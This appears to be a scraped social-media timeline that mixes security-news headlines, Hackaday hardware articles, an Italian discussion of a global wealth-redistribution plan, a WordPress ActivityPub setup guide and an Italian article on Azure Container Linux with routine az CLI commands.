The media in this post is not displayed to visitors. To view it, please go to the original post.
The current state of business.
Hypolite Petovan likes this.
reshared this
U.S. CISA adds SolarWinds Serv-U flaw to its Known Exploited Vulnerabilities catalog
securityaffairs.com/193245/sec…
#securityaffairs #hacking
securityaffairs.com/193245/sec…
#securityaffairs #hacking
U.S. CISA adds SolarWinds Serv-U flaw to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SolarWinds Serv-U flaw to its Known Exploited Vulnerabilities catalog.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
Pi Pico Puts Bluetooth Keyboards on the I2C Bus
The media in this post is not displayed to visitors. To view it, please log in.
If you’ve ever worked with I2C, you know its one of those things that makes working with modern microcontrollers such a pleasure. With a few wires and not many more lines of code, you can communicate with all sorts of hardware such as sensors, displays, and input devices. There are even I2C keyboards out there, although they tend to be a bit pokey — and not in the good way as it pertains to keyboards.
But the bt2i2c project from [Roberto Alsina] promises to improve things. With his firmware flashed to a Pi Pico W, you can establish a connection with any standard Bluetooth keyboard and have the keystrokes sent over the wire via I2C. As far as your project is concerned, the input will appear to be coming from a BlackBerry BBQ20/BBQ10 keyboard using the address 0x1F, which means that there’s already plenty of code out there to work with. While [Roberto] explains its not strictly necessary, connecting a ST7789 display to the Pi Pico over SPI will give you some visual feedback on connection status.
As microcontrollers become increasingly powerful and capable of the sort of thing we would once have done on a “real” computer, a project like this has some fascinating potential. We’ve seen a number of “writerdeck” projects running on chips like the ESP32, and it’s not hard to see the appeal of being able to easily pair your favorite Bluetooth keyboard up to one of them.
EOLE - Evento europeo sul diritto all'open source e al software libero
EOLE è un evento internazionale che mira a incoraggiare la condivisione e la diffusione delle conoscenze giuridiche relative alle licenze aperte, nonché lo sviluppo e la promozione di buone pratiche.
reshared this
Stratasys vs Bambu Lab: Industrial vs Consumer ABS Showdown
The media in this post is not displayed to visitors. To view it, please log in.
Professional Stratasys FDM printers demand a pretty hefty price premium over your typical hobbyist-level machine, with the gold-plating continuing even with the special filament cartridges that you buy for some of their printers.
This raises the question of in how far this eye-watering price tag is justified, and how much is just you paying for support and the brand name. After acquiring a spool of Stratasys ABS filament via a US viewer, [Dr. Igor Gaspar] set to work to try and answer this question.
The viewer had already liberated the spool of ABS+ P430 filament from its cartridge, making it easy to use that directly with the Bambu Lab FDM printer.
To make it a fair comparison, [Igor] also needed to have a sample printed on a real Stratasys printer, for which he used a local company’s services. An interesting sidenote here is that the US viewer’s company moved away from Stratasys to Bambu Lab printers.
[Igor] was able to see his test parts being printed on the Stratasys printer, as said company is in the same city. This showed him that it took 14 hours to print the parts versus 3.5 hours on the Bambu Lab printer, suggesting that his worries about the right printing parameters for the Stratasys filament were warranted. Sussing those out was thus paramount for a fair comparison and warranted some test prints.
From a sheer aesthetic point of view the Stratasys-printed parts looked much cleaner, and their dimensional accuracy was also significantly better due to the slicer adjusting for this. Between the used Stratasys M30 and Bambu Lab ABS filaments there’s no clear winner, with both trading blows. Amusingly enough, the older Stratasys ABS type in the form of the ABS+ P430 filament performed the best of all when printed on the Bambu Lab printer at its preferred temperature setting.
Moral of the story is thus that – unless you really want to pay for that service contract – to loot old Stratasys ABS spool cartridges and use them in your hobbyist FDM printer. As [Igor] says in the conclusion, the nicer looks is probably due to them printing very thin layers, much finer than the 0.2 mm layers he used. This would also match the much longer print time and is thus something we can replicate on any FDM printer with a temperature-controlled printing environment.
youtube.com/embed/n0kpiVpkZlI?…
The media in this post is not displayed to visitors. To view it, please go to the original post.
💥🚨 FLASH SALE: -10% FINO AL 7 GIUGNO PER L'OTTAVA LIVE CLASS "DARKWEB & CYBER THREAT INTELLIGENCE" IN PARTENZA A LUGLIO
Per info e iscrizioni: 📱 💬 379 163 8765 ✉️ formazione@redhotcyber.com
✅ Pagina del corso: redhotcyber.com/linksSk2L/acad…
✅ Presentazione del corso del prof. Pietro Melillo : youtube.com/watch?v=9VaQUnTz4J…
✅ Webinar introduttivo di presentazione al corso : youtube.com/watch?v=ExZhKqjuwf…
✅ Workshop di DarkLab alla RHC Conference 2026 : youtube.com/watch?v=yE1Li3TS5B…
Per info e iscrizioni: 📱 💬 379 163 8765 ✉️ formazione@redhotcyber.com
#redhotcyber #formazione #formazioneonline #ethicalhacking #cti #cyberthreatintelligence #cybersecurity #cybercrime #cybersecuritytraining #cybersecuritynews #privacy #cti #cyberthreat #intelligence #infosec #corsi #corsiprartici #liveclass
Workshop RHC Conference 2026 - Ransomware E-Volution
Profitez des vidéos et de la musique que vous aimez, mettez en ligne des contenus originaux, et partagez-les avec vos amis, vos proches et le monde entier.Red Hot Cyber (YouTube)
Cybersecurity & cyberwarfare reshared this.
Report: #Anthropic Deploys Engineers to Support #NSA Use of #Mythos
securityaffairs.com/193234/ai/…
#securityaffairs #hacking
securityaffairs.com/193234/ai/…
#securityaffairs #hacking
Report: Anthropic Deploys Engineers to Support NSA Use of Mythos
Reports claim Anthropic engineers are helping the NSA use its restricted AI model Mythos, known for advanced cybersecurity capabilities.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
The media in this post is not displayed to visitors. To view it, please go to the original post.
Si vede che io e Pixelfed non siamo destinati a stare insieme..
Cybersecurity & cyberwarfare reshared this.
Inside the Trump admin's push to integrate AI into the healthcare system, including an FDA regulatory fast track for digital health tech like AI chatbots (Elizabeth Dwoskin/Washington Post)
reshared this
Epic, the company behind MyChart, is pushing AI into every aspect of their healthcare platforms. It will do transcription, write discharge orders, manage the patient transportation through hospitals and more. People should be aware of the company.
The media in this post is not displayed to visitors. To view it, please go to the original post.
Attacco zero-day a CISCO Catalyst SD-WAN Manager: come proteggersi ora
📌 Link all'articolo : redhotcyber.com/post/attacco-z…
A cura di Carolina Vivianti
#redhotcyber #news #ciscosicurezza #vulnerabilitainformatica #attacchinformatici #cvesicurezza
Attacco zero-day a CISCO Catalyst SD-WAN Manager: come proteggersi ora
Scopri come la vulnerabilità Cisco Catalyst SD-WAN Manager CVE-2026-20245 sta colpendo le reti aziendali e quali misure adottare per proteggersi.Carolina Vivianti (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
La grande redistribuzione: il piano globale per smantellare la plutocrazia e fermare il collasso climatico. Lavorando (molto) meno e tassando i ricchi
Il Global Justice Report degli economisti del World Inequality Lab, tra cui Thomas Piketty, propone una radicale trasformazione dell’ordine economico mondiale di qui al 2100 per evitare la catastrofe ambientale. Il reddito medio mensile di tutti gli Stati convergerebbe a 5mila euro
ilfattoquotidiano.it/2026/06/0…
Tasse al 90% sui ricchi e settimana lavorativa dimezzata: il piano di Piketty
Il World Inequality Lab propone un fondo globale, tasse sui miliardari e 1000 ore lavoro l'anno per salvare il clima.Chiara Brusini (Il Fatto Quotidiano)
reshared this
5mila al mese ? Ciumbia è come se mi proponessero di fare una dieta mangiando lasagne e torte Sacher tutti i giorni... Dove posso firmare ?
informapirata ⁂ reshared this.
Comprendo, ma comunque è un reddito buono, cioè non è una roba da viver di espedienti o morir di fame....
Le cure mediche e i servizi pubblici dovrebbero continuare a rimanere con prezzi calmierati....ma immagino ne avranno tenuto conto nello studio del progetto per mantenerli accessibili.
Battute a parte, il progetto mi interessa molto, sono anni che leggo di decrescita e leggo che servirebbe un piano/uno studio strutturato....eccone uno finalmente.
Questa voce è stata modificata (1 settimana fa)
@andre123 certo che è buono, ma ti faccio solo riflettere che è più facile ottenere un aumento in busta paga di 100 euro l'anno dal proprio datore di lavoro piuttosto che ottenere 5000 euro mensili dalla "federazione internazionale dei capitalisti di buona volontà". E allora perché non riusciamo neanche a ottenere i 100 euro annui?
Che dire... L'utopia ha sempre il suo fascino 😅
hai ragione naturalmente, ma sono convinto che abbiano ragione al 100 % , nel senso che è la sola via percorribile secondo me. Gli ultra ricchi (no, non il vicino con la villetta e il bmw) sono un cancro per le democrazie, per il clima e financo per quei mercati economico/finanziari fluidi e funzionali che , a parole, dicono di amare.
Sembra utopia (ad oggi lo è, provare a spiegarlo a Trump...) , ma credo che un progetto così (e di sicuro andrà corretto strada facendo , rivisto, messo a punto ecc ) sia la sola strada per salvarci dal cambiamento climatico evitando al contempo guerre apocalittiche. Non vedo molte altre vie per uscirne.
E la cosa buffa è che sì, pare utopia ,ma il 99% della popolazione mondiale ne gioverebbe. A patto di far le cose per bene naturalmente. Solo l'1% starebbe peggio di oggi. Diciamo che brontolerebbe un 2/3% della popolazione e stop...
Sbaglierò di sicuro, ma a me pare sia la sola strada possibile.
informapirata ⁂ reshared this.
@andre123
Poi è arrivato Robespierre però, e i poveracci non stavano mica meglio.
Allora, pur essendo stata rimproverata più volte per la mia negatività, ipotizzare che tutti le nazioni del mondo si mettano d'accordo su un sistema universale di tassazione dei ricchi è pura utopia. Anche se il 90% dei paesi lo facesse, pensi davvero che Panama o altri non cercherebbero di accomodare gli ultra-ricchi?
informapirata ⁂ reshared this.
@s1m0n4 esattamente. La rivoluzione francese nasce grazie alla spinta dell'alta borghesia. E quella russa, grazie a un intellettuale di primissimo piano che riuscì a fare leva sul monumentale senso di sé che aveva il popolo russo, di fronte alla decadenza inarrestabile dell'impero zarista.
Trasformare la diseguaglianza in forza politica è un'impresa che negli ultimi 100 anni è riuscita solo al capitalismo.
Ma non è impossibile farlo: solo che è molto difficile
@andre123
Noi, con l'UE, possiamo ritenerci fra il i paesi che fanno più sforzi di integrazione a tutti i livelli. Eppure, già fra i 27, le politiche fiscali non sono minimamente uniformate. l'Irlanda attira le big tech statunitensi con tassazioni molto favorevoli. Il Portogallo attira i pensionati di tutto il mondo. Pure l'Italia, con la flat tax per i redditi superiori a 300k è un paradiso fiscale. No, non parliamo solo di Panama.
informapirata ⁂ reshared this.
ah non mi riferivo alla situazione odierna, come a dire ehi si può fare domani mattina, basta poco. Intendevo dire che un movimento organizzato che riuscisse a portare il 60% (non il 90%) del pianeta a essere "ostile" ai multi miliardari avrebbe una buona probabilità di successo.
Intendo dire che è una lotta dove non devi arrivare ad aver il 90% dalla tua per vincere. L'obiettivo è più basso secondo me. Perché sono loro a non farcela senza il 90% del pianeta a disposizione.
Chiaro è una lotta che non è vinta in partenza , tutt'altro, andrebbe costruita e con grandissimi sforzi e molti passi falsi temo. Servirebbe (tanta) gente che è disposta a rischiare e a lottare credendoci con forza , piuttosto che dire : naaah impossibile, non mi ci metto neanche.
Ovvio che servirebbero anni e anni, lustri.
Di promto, semplice , facile da spiegare con qualche slogan ad effetto invece che complesse spiegazion, e a colpo sicuro o quasi , non c'è nulla credo.
E non penso esistano molte altre vie per evitare un disastro sicuro. Quello si , praticamente certo. Salvo cambi qualcosa.
Questa voce è stata modificata (1 settimana fa)
informapirata ⁂ reshared this.
@andre123
Sì, in teoria concordo. In pratica, però, se tutti guadagnassimo 5000 €/mese, pur in condizioni più che dignitose rispetto al costo della vita, ci sarebbero persone (e non sarebbero nemmeno poche, imho) che pronerebbero e farebbero di tutto per guadagnare di più. Perché fa parte della natura umana.
Quello che attualmente mi terrorizza è che la creazione di ricchezza, ormai, è sempre più slegata dal lavoro effettuato. È questo è un fenomeno senza precedenti.
Come scrivi, fa parte della natura umana. Ma, immagino, se riuscissimo a creare un mondo più equo, dove NON tutti, MA la maggior parte delle persone ha di che vivere molto decentemente, allora probabilmente il numero di interessati a guadagnar di più un pochino scemerebbe.
Non ci sarebbero più costanti e martellanti incentivi a guadagnar di più. Ce ne saranno ancora, ma un pò mewno, e magari saranno visti "male" invece che bene come oggi. Non puoi rimodellare l'essere umano in 10 anni. Ci vogliono generazioni intere. E per certe cose siamo uguali uguali agli uomini e donne descritti nell'Antico Testamento...
La produzione (concreta, di cose utili ) sarebbe calibrata per soddisfare le necessità di tutti in maniera abbastanza equa (l'equità perfetta, quella sì, è abbastanza utopica).
Il "perfetto" è nemico del fare qualcosa intanto. E se non facciamo nulla dicendo:
ok o cambia tutto dall'oggi al domani, che possa vederlo anche io in qualche anno qusto cambiamento...non finiremo bene.
Forse dovremmo iniziare a tentare un cambiamento, sapendo che ci vorranno una generazione, o due, per vederne dei risultati. Che quindi la generazioni attuali dovranno solo darsi da fare per correggere una rotta nefasta impostata dalle generazioni precedenti, e forse senza neppure poter vedere come andrà a finire o goderne i risultati. Risultati che non saranno neppure perfetti, che ogni tanto bisognerà mettersi a rivedere un pò la situazione e correggere il tiro ecc. Ci sarà anche di che litigare (senza armi eh, discutere animosamente intonno a un tavolo intendo) , da far tentativi che andranno a rotoli ecc.
Perlomeno, io la vedo così. Non esistono bacchette magiche e i cambiamenti così importanti vanno iniziati dai nonni, ed i bisnipoti ne vedranno qualche risultato. Se tutto va bene.
Questa voce è stata modificata (1 settimana fa)
E' questo fatto, penso, che porta molti a vedere come utopistici dei progetti a lungo termine.
Eppure penso che nella situazione odierna non vi siano interruttori magici. Tutto al contrario. Per quello penso che la decrescita (che è un pò un mix di teorie, non un corpus compatto e monolitico) offra spunti (non manuali operativi) molto validi.
A patto di accettare che richiedono parecchio tempo.
Ma siccome alternative più rapide non ne vedo (una rivoluzione ? Auguri e buona fortuna contro Palantir & co.) penso sarebbe saggio almeno provare a studiarle e tentarle... E non solo nel "Sud" del mondo....
reshared this
Questa è una cosa che bisognerebbe provare a combattere... sin dalla scuola (dell'infanzia, sai quanti me ne descrive la mia compagna già messi così a 4 anni....)
E son convinto che oltre ai social centri anche come viene diretto il mondo...una sorta di CDA permamente...che naturalmente guarda alle trimestrali e chissenefrega di "fra dieci anni".
Maurizio Dallocchio, prof molto noto di economia aziendale, mi diceva che ciò era dovuto al fatto che è già difficilissimo far proiezioni a 3/6 mesi. Figurarsi sperare di azzeccare a 2/3 anni cosa accadrà.
Ok, ma qui non si tratta di far previsioni secche, ma casomai di seguirne l'evoluzione correggendo la rotta strada facendo...
rag. Gustavino Bevilacqua reshared this.
@andre123 @GustavinoBevilacqua @s1m0n4 c'è anche una differenza sostanziale tra la natura delle previsioni che deve fare un'azienda e quello che si deve fare a livello governativo. L'amministrazione di un Paese si deve occupare principalmente di garantire i servizi essenziali, e questo si può fare benissimo anche senza spiluccarsi il cervello su «ah ma come saranno le cose tra dieci anni».
Andre123 reshared this.
@oblomov @GustavinoBevilacqua @s1m0n4
Che poi è quel che intendo dicendo che non si devono far previsioni secche da incidere nelle tavole. Basta farsi un'idea di come sono i dati oggi, di come *potrebbero* evolvere e poi proseguire con i progetti adeguando la rotta quando dovesse esser necessario per contingenze varie.
@GustavinoBevilacqua @oblomov @s1m0n4
Beh questa però è pura incuria/noncuranza/menefreghismo/cialtroneria (scegli il nome che preferisci !)
Non penso le previsioni abbiano nulla a che fare. Era un dato, neppure una previsione, ma nessuno si è preso la briga di ragionarci sopra e far qualcosa di sensato.
rag. Gustavino Bevilacqua reshared this.
@andre123 @GustavinoBevilacqua @s1m0n4
parliamo di bambini di 4 anni, è naturale che siano "messi così", non hanno ancora la maturità di attendere per la gratificazione di un bisogno o desiderio. è l'età in cui si inizia a imparare, piano piano, con l'aiuto degli adulti..
il problema è quando gli adulti sono così, non i bambini. per loro è fisiologico
reshared this
The media in this post is not displayed to visitors. To view it, please go to the original post.
Io non ritengo che età anagrafica e maturità vadano di pari passo.
Basta guardare cose come questa casa per rendersene conto.
aus.social/@weirdestate/116705…
This is another home that has so much going on with it, I didn't know where to start. I guess I'll start here.
realestate.com.au/property-hou…
BB reshared this.
@GustavinoBevilacqua @bbacc @s1m0n4
🤣 Però la sala da biliardo ha un suo fascino. Magari togliendo i quadri dal soffitto.... Il resto è inquietante....
rag. Gustavino Bevilacqua reshared this.
@GustavinoBevilacqua @bbacc @s1m0n4
E' una cosa che ho notato. chi ha un mare di soldi da sbatter via ogni tanto fa cose che ti domandi che senso abbiano...
Non ne hanno di senso, è viver nel paese dei balocchi potendolo fare. Della serie, lo voglio, posso, chissenefrega dell'universo mondo , lo faccio e basta.
Appunto, due anni...
rag. Gustavino Bevilacqua reshared this.
Bezos ci ha fatto i miliardi, sulla gente che vuole tutto subito.
A me potrebbero servire dadi a galletto M3: so che tra un paio di settimane passerò davanti al ferramenta di Mondovì e aspetto, non c'è bisogno di far arrivare un camion apposta da Crosettoburgo per portarmeli.in 24 ore.
ci sono delle attività per cui ho il rifiuto totale e se non sfrutto il periodo finestra in cui tollero l'idea di portarle a termine, non lo faccio più 🤣 questi sono i casi dove prenderei la macchina e andrei a comprare quello che mi serve subito perché sennò ciao gatto
rag. Gustavino Bevilacqua reshared this.
Entro certi limiti assolutamente sì, ma alcuni sono preoccupanti.... Non è il mio campo, ma la mia compagna me ne descrive alcuni particolarmente irrequieti, o con un'attenzione bassissima (parecchio inferiore alla media dei loro compagni)
Questa voce è stata modificata (1 settimana fa)
questo è vero, in media lo span attentivo si è abbassato , e anche le capacità educative delle famiglie sono limitate, da cause esterne e interne
@GustavinoBevilacqua @s1m0n4
rag. Gustavino Bevilacqua reshared this.
Ed è, almeno per me dall'esterno, curioso come questo non sempre dipenda dalla famiglia di origine (in parecchi casi sì, ma non sempre).
Cioè alcuni di questi bimbi più irrequieti vengono da situazioni oggettivamente un pò complicate (brutte separazioni, genitori allo sbando che poco si curano dei figli ecc.) ; ma altri invece da genitori attenti e premurosi, con una vita normalissima , che cercan subito di portare il figlio da uno specialista ecc..
Questa voce è stata modificata (1 settimana fa)
rag. Gustavino Bevilacqua reshared this.
vero, è un fenomeno globale, siamo tutti sovrastimolati, abbiamo poco tempo, dobbiamo fare tutto e sapere tutto, va tutto molto veloce in generale, le relazioni sono sempre piu mediate dai mezzi tecnologici e c'è poco contatto con la natura; questo oltre ai fattori genetici
poi abbiamo anche la tendenza a medicalizzare i fenomeni che non ci tornano, che a volte è fondamentale, a volte è un modo di tenere sotto controllo qualcosa che ci pare scomoda
@GustavinoBevilacqua @s1m0n4
rag. Gustavino Bevilacqua reshared this.
@oblomov @GustavinoBevilacqua @s1m0n4
Sì il senso era un pò quello.
Dev'esserci una sorta di unità di intenti fra Nord e Sud del mondo perchè una cosa del genere stia in piedi....e già qui si vede il tempo che ci vorrà....
@rag. Gustavino Bevilacqua no, impossibile. Sono tra i moderatori di mastodon.uno e posso confermarti che il tuo account non è bloccato
s1m0n4 likes this.
@rag. Gustavino Bevilacqua sì, così ha più senso. Vedi che non bisogna mai dare subito la colpa agli altri... 😁
che in soldoni vorrebbe dire "quel che è stato fatto dagli anni 70 per reagire alla stagflazione ha causato disastri immani, il neoliberismo sta distruggendo il pianeta oltre alle società umane (che, ricordiamolo, per gli alfieri del neoliberismo come Thatcher "società" è un concetto che nemmeno esiste), quindi ripartiamo da Keynes e aggiustiamo il tiro. In linea di principio concordo, ma approfondirò andando alla fonte. Grazie dello spunto. Ho un piccolo appunto (--->)
Homebrew Webcam Support for the Original Xbox
The media in this post is not displayed to visitors. To view it, please log in.
These days, we take it for granted that a video game console will have multiple USB ports. There’s even an expectation that basic peripherals such as storage devices will “Just Work” when plugged into the system — a far cry from the days when each system had its own proprietary memory card.
The original Xbox from 2001 actually had USB ports as well, it’s just that they were used for the controllers and had non-standard connectors that kept you from plugging in other devices. But a simple adapter gets you a standard USB-A port, and after that it’s just a matter of software. Like this homebrew project to get generic USB webcams working on Microsoft’s first foray into console gaming.
Well, “generic” may be pushing it a bit, as the project by [Darkone83] currently lists only two compatible cameras. The first is the Xbox Live Vision Camera, which was never intended to be used on the original Xbox and was instead an accessory for Microsoft’s follow-up console, the Xbox 360. Interestingly, the other supported camera happens to be Sony’s PS2 EyeToy. Claiming that you plugged a PS2 camera into your Xbox would have been fighting words back on the playground circa 2003, but now it’s a reality thanks to the power of open source.
Now there technically was a camera for the original Xbox, but it was only released in Japan and is quite rare. Perhaps unsurprisingly it used the same OV519 chipset as the EyeToy and later Vision Camera, and reverse engineering how the console communicated with it was critical to the development of this project.
As of right now, there’s not much practical application for this webcam driver. It just shows the image from the camera on your TV in glorious 320×240 resolution. But now that the code to make it work is out in the wild, hopefully other Xbox homebrew projects will add support for it.
Although things aren’t quite as active these days as they once were, the hacking scene for the original Xbox is the stuff of legend. If you ever see one of this gargantuan consoles at a flea market for cheap, there’s still plenty of fun to be had pushing the system outside of its comfort zone.
Ho creato un gruppo di discussione focalizzato sulla federazione di Wordpress. Che ne pensate?
Mi farebbe piacere se chi ha un blog federato o, più in generale, chiunque si interessi a questo argomento, partecipasse alle discussioni di questo gruppo.
Che ne pensate?
reshared this
@wordpress Io sono una delle traduttrici del plugin ActivityPub per WordPress. Sono su selfhost però, non su wordpress.com - cioè sì, ho un account lì ma è per monitorare i vecchi contatti da jetpack, da cui mi sono tolta dopo wpdrama
Informa Pirata likes this.
macfranc reshared this.
Ho creato un gruppo di discussione focalizzato sulla federazione di Wordpress. Che ne pensate?
The media in this post is not displayed to visitors. To view it, please go to the original post.
@elettrona@poliversity.it sicuramente i selfhoster sono i soggetti con le esperienze più interessanti.
Sarebbe interessante creare una serie di guide collettive per federare il proprio blog. Qualcosa di semplice come la guida che @acor3@mastodon.uno ha scritto su suo blog
Ora vedremo come fare affinché il tuo blog possa implementare il protocollo ActivityPub. I tuoi lettori potranno seguire i post del tuo blog su Mastodon e altre piattaforme federate che supportano ActivityPub, attualmente il plugin supporta:# installare
Installaiamo il plugin ActivityPub By Matthias Pfefferle
# prendere il proprio Fediverse Profile identifier
Se apriamo il profilo del nostro utente, in basso troveremo queste informazioni
# vedere i followers
alla pagina
/wp-admin/users.php?page=activitypub-followers-list
è possibile vedere gli utenti che ci seguono
# problemi noti ## Yoast SEO
Se si usa il plugin Yoast SEO l’url della pagina del profilo dell’autore viene riscritta
acortech.it/author/admin/
e quindi non funziona il follow da instanze mastodoninfatti nel pannello site Healt
/wordpress/wp-admin/site-health.php
dice
### come risolvere
Seguendo la guida di yoast possiamo abilitare gli archivi dei post dell’utente andare in /wp-admin/admin.php?page=wpseo_titles#top#archivese abilitare in questo modo:
acortech.it/2022/11/19/come-fa…
Giving social networking back to you
Mastodon is an open source decentralized social network - by the people for the people. Join the federation and take back control of your social media!joinmastodon.org
macfranc reshared this.
Io ne ho scritta una su come creare un multilingua di base usando gutenberg. Sistema che sto dismettendo in quanto oramai questo tipo di struttura è per me obsoleta, e la voglio rifare in modo più scalabile e stabile. Te la condivido in altro modo, devo capire come, perché qui su questo spazio, i post vanno via dopo 2 settimane. Ora è su WordPress sul sito di produzione. Ma se interessa la piazzo su feddit. O su citiverse (dovrei avere l'account pure lì)
Io di ActivityPub e Fediverso, ho parlato al WordCamp Pisa 2025.
cc @acor3
wordpress.tv/2025/12/15/activi…
ActivityPub e il Fediverso: WordPress alla conquista del mondo!
Per un lavoro o passione coltivati in rete, i social network sono fondamentali per farsi conoscere, ma quelli più famosi pongono diversi ostacoli: Ogni piattaforma richiede un profilo a sé. Non puo…WordPress.tv
3D Printing a Miniature CoreXY Printer
The media in this post is not displayed to visitors. To view it, please log in.
Although no longer so common as during the heyday of the RepRap movement, it’s easier than ever to build your own largely-printed 3D printer, with designs such as Voron’s delivering excellent quality. Nevertheless, there are still niches to be filled by new designs, such as [Alex Yu]’s mostly-printed Encore design.
The Encore uses CoreXY kinematics and linear rails for the X and Y axes. Its has no internal frame; the linear rails are mounted directly to the side panels, which were printed but provided sufficient rigidity. The printer is modular, and all the parts are designed to fit within a 225 mm print bed. The Encore itself uses a 120 mm bed, a Bowden extruder, and a lightweight Bambu-style hotend. The drive motors are NEMA 17 stepper motors, and they use sliding mounts for belt tensioning. The power supply sits behind the rods supporting the Z axis, and the controller board is in the base of the printer.
Building the printer was simple; tuning it, less so. The combination of a Bambu-type hotend with a Bowden extruder created some complications, and the hotend initially received too little cooling. [Alex] solved the cooling issues by using a stronger fan on the hotend, redesigning the ventilation shroud, and adding two inward-blowing fans along the sides of the build volume. After correcting some issues with Z-axis stability, the Encore produced some quite good-looking parts. [Alex] is still improving and documenting some aspects of the printer, but he’s uploaded his progress so far to GitHub.
We’ve seen some mostly-printed printers before, including a high-speed printer, one which printed all structural components, and one which was entirely 3D printed.
youtube.com/embed/9xukniyO6fI?…
Thanks to [DJBiohazard] for the tip!
🎙️ Risky Bulletin: EU unveils digital sovereignty plan
Risky Bulletin: EU unveils digital sovereignty plan - Risky Business Media
The EU unveils its digital sovereignty plan, an American law firm pays a $20 million ransom, authorities take down millions of email and s [Read More]risky.biz
reshared this
📰 Risky Bulletin: The EU debuts digital sovereignty plan
risky.biz/risky-bulletin-the-e…
Risky Bulletin: The EU debuts digital sovereignty plan - Risky Business Media
The European Commission unveiled on Wednesday a plan to decouple from American companies and boost the bloc's tech sovereignty.The plan wo [Read More]risky.biz
reshared this
The media in this post is not displayed to visitors. To view it, please go to the original post.
Azure Container Linux su AKS: il sistema operativo immutabile e hardened di Microsoft per Kubernetes
#tech
spcnet.it/azure-container-linu…
@informatica
Azure Container Linux su AKS: il sistema operativo immutabile e hardened di Microsoft per Kubernetes
A Microsoft Build 2026, Microsoft ha annunciato la disponibilità generale di Azure Container Linux (ACL), un sistema operativo immutabile e hardened progettato specificamente per i nodi di Azure Kubernetes Service (AKS). Contemporaneamente, è entrata in public preview Azure Linux 4.0, la prima distribuzione Linux server di Microsoft per ambienti cloud enterprise. Si tratta di un cambio di paradigma significativo nella gestione dell’infrastruttura Kubernetes: addio al configuration drift, benvenuta riproducibilità totale.Perché un OS dedicato per Kubernetes?
Chiunque gestisca cluster Kubernetes in produzione conosce bene i problemi legati alla deriva della configurazione (configuration drift). I nodi Linux tradizionali — anche se avviati da un’immagine controllata — tendono ad accumulare modifiche nel tempo: aggiornamenti in-place, file di configurazione modificati manualmente, pacchetti installati per debugging, variazioni tra ambienti diversi. Il risultato è che due nodi teoricamente identici si comportano in modo differente, rendendo debugging e ripristino molto più complessi.L’altro fronte critico è la superficie di attacco: un OS generalista porta con sé decine di pacchetti, servizi e porte che non hanno alcuna ragione di esistere su un nodo Kubernetes. Ogni componente non necessario è un potenziale vettore di compromissione.
Azure Container Linux nasce esattamente per risolvere entrambi i problemi.
Caratteristiche tecniche di Azure Container Linux
Sistema operativo immutabile basato su Flatcar
ACL è costruito a valle di Flatcar Container Linux, la distribuzione già nota per la sua architettura immutabile e orientata ai container. L’adozione di Flatcar come base garantisce compatibilità con l’ecosistema esistente e un design maturo e collaudato. Su ACL, il filesystem di sistema è montato in sola lettura: nessun processo, nemmeno con privilegi di root, può modificare il sistema operativo a runtime. Questo elimina alla radice la possibilità di configuration drift e rende ogni nodo perfettamente riproducibile.Integrity Policy Enforcement (IPE)
Una delle innovazioni più rilevanti di ACL è l’integrazione del Linux Security Module IPE (Integrity Policy Enforcement). IPE verifica che solo i binari provenienti da volumi firmati e trusted possano essere eseguiti. Questo controllo si estende anche alle immagini container: grazie all’integrazione con dm-verity — il meccanismo di verifica crittografica a livello di blocco del kernel Linux — ogni layer dell’immagine container viene verificato rispetto a una firma digitale prima che qualsiasi binario al suo interno possa essere eseguito.In pratica, anche se un attaccante riuscisse a inserire codice malevolo in un layer container o nel filesystem del nodo, IPE bloccherebbe l’esecuzione di qualsiasi binario non autorizzato. È un approccio defense-in-depth particolarmente efficace contro attacchi supply chain e compromissioni post-deployment.
Aggiornamenti tramite node image upgrade
Su un OS immutabile, gli aggiornamenti non avvengono con package manager tradizionali comeaptodnf. ACL si aggiorna esclusivamente tramite il meccanismo di node image upgrade di AKS: il nodo viene sostituito con una nuova immagine aggiornata, garantendo che lo stato di partenza sia sempre pulito e noto. Questo approccio elimina i problemi tipici degli aggiornamenti in-place e semplifica enormemente la gestione del ciclo di vita dei nodi.Azure Linux 4.0: la distribuzione server di Microsoft
Parallelamente ad ACL, Microsoft ha annunciato la public preview di Azure Linux 4.0, una distribuzione Linux server progettata per ambienti Azure cloud su larga scala. Mentre ACL è ottimizzato per i nodi Kubernetes, Azure Linux 4.0 è pensato come base per workload generici su macchine virtuali Azure. Entrambe le distribuzioni condividono il core di Azure Linux, che fornisce coerenza e compatibilità con l’ecosistema Azure.Come usare Azure Container Linux su AKS
ACL è disponibile come opzione di sistema operativo per i node pool di AKS. Per creare un cluster o un node pool con ACL, è sufficiente specificareAzureContainerLinuxcome OS SKU:# Creare un nuovo cluster AKS con Azure Container Linux az aks create \ --resource-group myResourceGroup \ --name myAKSCluster \ --node-os-upgrade-channel NodeImage \ --os-sku AzureContainerLinux \ --generate-ssh-keys # Aggiungere un node pool con ACL a un cluster esistente az aks nodepool add \ --resource-group myResourceGroup \ --cluster-name myAKSCluster \ --name acnodepool \ --os-sku AzureContainerLinux
Il parametro--node-os-upgrade-channel NodeImageè consigliato per sfruttare appieno il modello di aggiornamento immutabile: AKS si occuperà automaticamente di sostituire i nodi con le versioni aggiornate dell’immagine OS.Kubernetes 1.35 e Fleet Manager cross-cluster networking
Insieme all’annuncio di ACL, Microsoft Build 2026 ha portato altre novità rilevanti per AKS:
- Kubernetes 1.35 GA: la versione 1.35 è ora disponibile a livello generale su AKS e in fase di rollout in tutte le region.
- Azure Kubernetes Fleet Manager per cluster Arc-enabled (GA): gestione di flotte che includono cluster on-premises abilitati ad Azure Arc, con update, policy e placement da un singolo piano di controllo.
- Cross-cluster networking (preview): networking cross-cluster per Fleet Manager basato su Cilium gestito, con service discovery, policy enforcement e observability tramite eBPF.
Conclusione
Azure Container Linux è una risposta concreta ai problemi di sicurezza e riproducibilità dell’infrastruttura Kubernetes tradizionale. L’approccio immutabile, l’enforcement crittografico dei binari tramite IPE e dm-verity, e l’integrazione nativa con il ciclo di vita AKS lo rendono una scelta solida per chi gestisce workload critici in ambienti con requisiti di compliance (PCI-DSS, HIPAA, ISO 27001). Microsoft Build 2026 segna un momento importante per l’ecosistema AKS, con novità che coprono sicurezza OS, gestione multi-cluster e networking avanzato.Fonte: Introducing Azure Container Linux (ACL) — Microsoft Community Hub | What’s new in AKS at Microsoft Build 2026
What's new in Azure Kubernetes Service at Microsoft Build 2026 | Microsoft Community Hub
